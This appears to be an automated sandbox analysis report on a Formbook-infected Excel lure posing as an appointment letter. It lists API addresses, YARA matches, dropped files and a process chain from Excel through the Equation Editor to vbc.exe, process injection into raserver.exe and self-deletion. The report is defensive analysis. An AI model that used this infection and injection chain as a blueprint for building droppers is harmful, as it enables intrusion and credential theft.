          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F80C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000983B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000981CE NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009827A NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000983AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404853
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406131
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73001A98
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C0A9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C1CD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B992
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C2A7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A302
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C6B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B4B3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD9E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DD005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00851238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FA37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008563BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007D63DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007ED47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C1489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E5485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007F6540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007CC5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007FA634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00852622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007BE6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B4680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E57C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007BC7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007D286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007BC85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C69FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B29B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00835955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00863A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007D7B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AFBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007BCD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E0D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007CEE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E2E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DDF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C0F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C0A9
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C1CD
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C2A7
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A302
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B4B3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02031238
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8E0C6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA905A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F93040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FBD005
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB63DB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8F3CF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FDA37B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F97353
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F92305
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8E2E9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FAC5F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02032622
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9351F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA1489
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FC5485
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FCD47D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201579A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FC57C3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9C7BC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9E6C1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F94680
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA69FE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F929B2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02043A83
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB286D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9C85C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0203CBA4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201DBDA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8FBD7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202F8EE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB7B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02015955
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0203098E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9CD5B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FC0D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FBDF7C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA0F3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FAEE4C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FC2E2F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202FDDD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A302
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00088C6B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00088C70
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082FB0
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FD373B appears 238 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F8DF5C appears 107 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FD3F92 appears 108 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FFF970 appears 81 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F8E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007F3F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00419F80 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007ADF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007F373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0081F970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007AE2A8 appears 38 times
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/21@5/4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCFFB.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxVirustotal: Detection: 25%
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxStatic file information: File size 1331416 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73002F60 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041624A pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040B7D2 push ebx; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007ADFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041624A pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B41B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009624A pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B41B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B412 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B47C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0008B7D2 push ebx; retf
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
